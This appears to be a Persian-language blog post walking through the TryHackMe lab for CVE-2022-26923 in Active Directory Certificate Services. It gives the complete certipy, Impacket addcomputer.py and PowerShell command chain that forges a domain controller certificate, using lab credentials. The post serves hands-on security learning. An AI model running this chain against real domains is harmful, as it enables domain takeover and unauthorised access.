CVE-2022-26923 | TryHackMe – انجمن DEV

سلام!

امروز ما CVE-2022-26923 را پوشش خواهیم داد.

CVSS نسخه 3
امتیاز پایه: 8.8
بردار: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
شدت: زیاد

به CVE-2022-26923 TryHackMe خوش آمدید. امروز تصمیم گرفتم در مورد خدمات گواهی اکتیو دایرکتوری بیاموزم و فکر می کنم که این راهنما فرصت خوبی بود. من certipy را کشف کردم و روی nmap و Impacket تمرین کردم
addcomputer.py.

🔗 لینک به walkthorugh: https://tryhackme.com/r/room/cve202226923

🡡 سختی: آسان

⚙️ ابزار:

💭 توجه: $Target_IP= IP ماشین
برخی از اسکرین شات ها عمدا حذف شدند. من واقعاً شما را تشویق می کنم که اگر به حمایت نیاز دارید یا فقط برای گفتن نظر دارید، نظر بدهید print("Hello world"). 😄

در GitHub من اطلاعات بیشتری در مورد آن پیدا خواهید کرد مایکروسافت ADCS.

🪜 مراحلی که من دنبال کردم (پس از استقرار دستگاه:

نام DNS و IP دستگاه را به آن اضافه کنید /etc/hosts

اسکن nmap را اجرا کنید
nmap -A -Pn $Target_IP

پورت های 88 و 389 باز هستند.

-88 برای سیستم احراز هویت Kerberos استفاده می شود

-389 برای ایجاد اتصالات LDAP است تا کاربران بتوانند به منابع شبکه محافظت شده دسترسی داشته باشند. اتصالات ایجاد شده از طریق این پورت رمزگذاری نشده است.

نام Enterprise CA را دریافت کنید
certipy find -u thm@lunar.eruca.com -p Password1@ -dc-ip $Target_IP

تولید گواهی آزمایشی

certipy req -username thm@lunar.eruca.com -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP

بررسی کنید که این گواهی معتبر است و می تواند برای احراز هویت Kerberos استفاده شود

certipy auth -pfx thm.pfx

یک کامپیوتر به دامنه اضافه کنید

python3 addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@' -dc-ip $Target_IP

یک گواهی برای رایانه جدید ایجاد کنید

certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP -template Machine

تأیید کنید که گواهی معتبر است

certipy auth -pfx thmpc.pfx

SSH به دستگاه

ssh lunar.eruca.com\\thm@lundc

Powershell را راه اندازی کنید

powershell

ویژگی های فعلی را از شیء AD کامپیوتر ما دریافت کنید

Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

ویژگی DNS hostname را به DC به روز کنید

Set-ADComputer THMPC -ServicePrincipalName @{}

ویژگی DNS hostname را روی DC تنظیم کنید

Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com

بررسی کنید که تغییرات ایجاد شده است

Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

جعل گواهی مخرب:

• درخواست گواهی جدید

certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target lundc.lunar.eruca.com -template Machine

certipy auth -pfx lundc.pfx

و ما پرچم داریم!